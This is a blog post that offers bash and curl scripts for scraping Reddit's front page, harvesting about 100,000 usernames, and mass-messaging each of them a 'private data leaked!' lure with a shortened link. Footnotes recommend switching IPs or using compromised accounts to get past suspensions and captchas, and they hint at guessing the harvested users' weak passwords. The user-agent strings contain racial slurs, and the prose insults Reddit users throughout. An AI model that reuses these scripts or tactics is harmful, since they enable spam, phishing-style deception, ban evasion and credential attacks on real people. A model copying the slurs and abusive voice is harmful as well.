Reddit, the derpage of the Internet

Friday, 01 July, Year 8 d.Tr. | Author: Mircea Popescu

To brush up on the previous discussion of the topic :

reddit-the-derpage-of-the-internet

Reddit remains two years later just as vulnerable as it always was ; and just as vulnerable as every other "social media" / forum website out there today. Them's the breaks.

~ And now for the practical part of our article ~

I. Enumerating Reddit posts. Reddit, the derpage of the Internet, invented the cleverest scheme ever to prevent enumeration of its posts : you don't pass along an index parameter like with every other god forsaken web-social-media shithole, oh no! The much more secure and defense-y proactive in the global blabla method is to require an index and a token from the previous page! So you can only serialize, rather than... hey, what did enumeration mean again ? Oh, right, background and experience in security experience spawns many years. That's right.

Anyway, to cut to the chase, there's this little script :

#!/bin/bash
for value in {25..1000000..25}
do

variable=$(tail -n 1 retarddit-all.txt | awk -v FS="(count=$value&after=|\"rel=\"nofollow next)" '{print $2}';)
echo $variable
echo $value

curl -A "Nigger-Cunts/2.0 (UrMom Forever Linux rv:177.20.11) Dicko/555-328-3425i CALL NOW/DTFP" "https://www.reddit.com/r/all/?count=$value&after=$variable" >> retarddit-all.txt

sleep 3s

done

To use it : download the first page of reddit.com/r/all/ and save it as retarddit-all.txt ; then run the script. It will slowly balloon that file with the entire contents of the "all subreddits", which may not be interesting at all but is nevertheless chock full of... you've guessed it! Comments! Because that's ~what they do all day, other than huffing butter and not throwing out the cat litter. Which takes us to the next part of our show,

II. Enumerating redditards. Once you have a decently padded retarddit-all.txt worth a few GB or so, it's time to

cat retarddit-links.txt | grep -o '.\{0,32\}/comments/.\{0,128\}'ii > retarddit-link-mess.txt

cat retarddit-link-mess.txt | sed 'g%/r/%\n%' | sed 'g%/ "%/\n%' | grep "/comments/" > retarddit-links.txt

cat retarddit-links.txt | while read line; do curl -A "Nigger-Cunts/2.0 (UrMom Forever Linux rv:177.20.11) Dicko/555-328-3425 CALL NOW/DTFP" "$line?limit=500" | awk -v FS="(data-author=|data-author-fullname=)" '{print $2}' > rtards.txt ; sleep 3iii ; done

You can probably guess what this does - but if you can't : loads all the crap you previously downloaded, string-matches the sort of link we want, cuts the crap off on either side (hey btw - look up teleomers while at it, this is an educational programme after all!) and feeds it into a loop, which then proceeds to download the stuff into rtards.txt.

Here's a sampleiv, if you're lazy - and that takes us to the next part of our show,

III. Spamming reddit. Oh, you were wondering how the image above was generated ? Well, first we gotta login :

curl --cookie-jar - -A "Nigger-Cunts/2.0 (UrMom Forever Linux rv:177.20.11) Dicko/555-328-3425 CALL NOW/DTFP" --data
"op=login&dest=https%3A%2F%2Fwww.reddit.com%2Fmessage%2Fcompose%2F%3Fto%HilaryClinton&user=HilaryClinton&passwd=BillSucks&api_type=json"
https://www.reddit.com/api/login/HilaryClinton >> securitits.txt

You'll get some cookies, which you serialize ; and a "modhash" variable, which is the uh parameter. Thus informed, you can proceed to talk to people (from a safe distance) :

cat rtards.txt | while read line; do curl -A "Nigger-Cunts/2.0 (UrMom Forever Linux rv:177.20.11) Dicko/555-328-3425 CALL NOW/DTFP" --cookie
"__cfduid=d494d20a9cb1414f863b992823ebffcae1467378194;
loid=SsqCmIX20eiP8uhz9n;loidcreated=2016-07-01T13%3A03%3A14.348Z;
secure_session=1;reddit_session=59061742%2C2016-07-01T06%3A03%
3A14%2C2dcafd20966c1244720501a259e346df4695d62c
"
--data
"uh=0vmwmaq1hn0f43858babf83785c5ef77ad5347cdeecd678941&to=$line&undefined=&subject=Check+this+out\!&thing_id=&text=%5B%2Fu%2F$line%5D(https%3A%2F%2Fbitly.com%2F297qOu4)+private+data+leaked\!&source=compose&id=%23compose-message&renderstyle=html"
"https://www.reddit.com/api/compose/" >> rtards-r.txt ; echo "\n$line\n"
>>rtards-r.txt ; sleep 3 ; done

Three to however many hours later, your account will get suspended. You don't particularly care, rtards-r.txt contains a lengthy lists of "success": true} followed by the name in question. Just resume from the last name, on another account.v

Enjoy.

PS. Oh, almost forgot,
Signature: 0x5f91152a2382b4acfdbfe8ad3c6c8cde45f73f6147d39b072c81637fe810060616039
08f692dc15a1b6ead217785cf5e07fb496708d129645f3370a28922136a32

———
  1. Eat-dicks, if you must know. It's a vanity thing. []
  2. Dirty, I'll grant, but then again we're dealing with the web here, and not just any web, but a web property you understand. Heck, they even issued notes! It's practically a bank, you read me ?

    What ever came of those, by the way ? []

  3. In case you're wondering, they have a 2 second API threshold. []
  4. ~1.3MB, ~100k names on there. Only took all of half an hour to pile together, I'm sure you can do much better (though I'm unsure it'd matter, 100`000 redditards are too many for any purpose anyway).

    By the way, do you suppose any of these use weak passwords by any chance ? []

  5. If you stick to the same IP they'll hit you with google captchas at some point. They're as weak as we know them to be ; moreover using compromised user accounts or simply moving on to a new IP give you another few thousand shots at the retards' inboxes. []
Category: Meta psihoza
Comments feed : RSS 2.0. Leave your own comment below, or send a trackback.
Add your cents! »
    If this is your first comment, it will wait to be approved. This usually takes a few hours. Subsequent comments are not delayed.